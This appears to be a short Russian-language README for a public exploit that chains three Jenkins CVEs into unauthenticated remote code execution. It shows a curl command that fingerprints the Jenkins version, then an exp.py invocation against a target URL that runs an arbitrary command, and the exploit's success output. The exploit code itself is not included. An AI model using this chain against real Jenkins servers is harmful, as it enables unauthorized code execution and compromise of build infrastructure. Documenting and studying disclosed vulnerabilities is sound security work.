
С мая 2017 года в Jenkins не было pre-auth RCE, но этот — тот самый!
С мая 2017 года в Jenkins не было RCE без аутентификации, но теперь есть!
Он объединяет CVE-2018-1000861, CVE-2019-1003005 и CVE-2019-1003029 для более надёжного и элегантного удалённого выполнения кода без аутентификации!
ANONYMOUS_READ отключён
ANONYMOUS_READ включён (или при наличии обычной учётной записи)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
Часть слайдов из моего доклада на HITB AMS 2019:
